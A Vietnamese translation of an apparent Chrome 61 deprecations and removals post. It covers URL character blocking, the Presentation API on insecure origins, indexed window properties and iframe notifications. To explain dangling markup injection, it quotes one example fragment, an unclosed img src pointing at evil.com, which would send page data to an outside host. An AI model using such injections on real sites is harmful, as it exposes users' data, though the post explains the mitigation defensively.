Trong hầu hết các phiên bản Chrome, chúng ta đều thấy một số lượng đáng kể các bản cập nhật và cải tiến đối với sản phẩm, hiệu suất của sản phẩm cũng như các tính năng của Nền tảng web. Bài viết này mô tả các tính năng ngừng hoạt động và bị xoá trong Chrome 61, phiên bản đang trong giai đoạn thử nghiệm từ ngày 3 tháng 8. Danh sách này có thể thay đổi bất cứ lúc nào.
Bảo mật và quyền riêng tư
Chặn các tài nguyên có URL chứa ký tự '\n' và '<'
Có một loại hình tấn công được gọi là chèn mã đánh dấu lơ lửng, trong đó một URL bị cắt ngắn được dùng để gửi dữ liệu đến một điểm cuối bên ngoài. Ví dụ: hãy xem xét một trang chứa <img src='https://evil.com/?. Vì URL không có dấu ngoặc kép đóng, nên trình duyệt sẽ đọc đến dấu ngoặc kép tiếp theo xuất hiện và coi các ký tự được bao bọc như thể đó là một URL duy nhất.
Chrome 61 giảm thiểu lỗ hổng này bằng cách hạn chế các bộ ký tự được phép trong thuộc tính href và src. Cụ thể, Chrome sẽ ngừng xử lý URL khi gặp ký tự dòng mới (\n) và ký tự nhỏ hơn (<).
Nhà phát triển có trường hợp sử dụng hợp lệ cho dòng mới và các ký tự nhỏ hơn trong URL nên thoát khỏi các ký tự này.
Ý định xoá | Trình theo dõi trạng thái Chrome | Lỗi Chromium
Ngừng sử dụng và xoá API Bản trình bày trên các ngữ cảnh không an toàn
Chúng tôi nhận thấy rằng trên các nguồn gốc không an toàn, Presentation API có thể được dùng làm vectơ xâm nhập trên các nguồn gốc không an toàn. Vì màn hình không có thanh địa chỉ nên API có thể được dùng để giả mạo nội dung. Bạn cũng có thể trích xuất dữ liệu từ bản trình bày đang chạy.
Để phù hợp với ý định của Blink là xoá các tính năng mạnh mẽ trên các nguồn gốc không an toàn, chúng tôi dự định sẽ ngừng sử dụng và xoá tính năng hỗ trợ cho Presentation API trên các ngữ cảnh không an toàn. Kể từ Chrome 61, PresentationRequest.start() sẽ không còn hoạt động trên các nguồn gốc không an toàn.
Ý định xoá | Trình theo dõi trạng thái Chrome | Lỗi Chromium
JavaScript
Không cho phép xác định các thuộc tính được lập chỉ mục trên cửa sổ
Trước đây, một số trình duyệt cho phép các chỉ định JavaScript như sau:
window[0] = 1;
Ghi chú về thông số kỹ thuật HTML hiện tại cho biết rằng đây là hành vi vi phạm rõ ràng thông số kỹ thuật JavaScript. Do đó, tính năng này sẽ bị xoá trong Chrome 61. Kể từ tháng 2 năm 2016, Firefox đã tuân thủ.
Xoá việc sử dụng thông báo khỏi các iframe không an toàn
Yêu cầu cấp quyền từ iframe có thể gây nhầm lẫn cho người dùng vì khó phân biệt giữa nguồn gốc của trang chứa và nguồn gốc của iframe đang đưa ra yêu cầu. Khi phạm vi yêu cầu không rõ ràng, người dùng sẽ khó đánh giá xem có cấp hay từ chối quyền.
Việc không cho phép thông báo trong iframe cũng sẽ điều chỉnh các yêu cầu về quyền thông báo cho phù hợp với thông báo đẩy, giúp nhà phát triển dễ dàng hơn.
Những nhà phát triển cần chức năng này có thể mở một cửa sổ mới để yêu cầu quyền thông báo.
Ý định xoá | Trình theo dõi trạng thái Chrome | Lỗi Chromium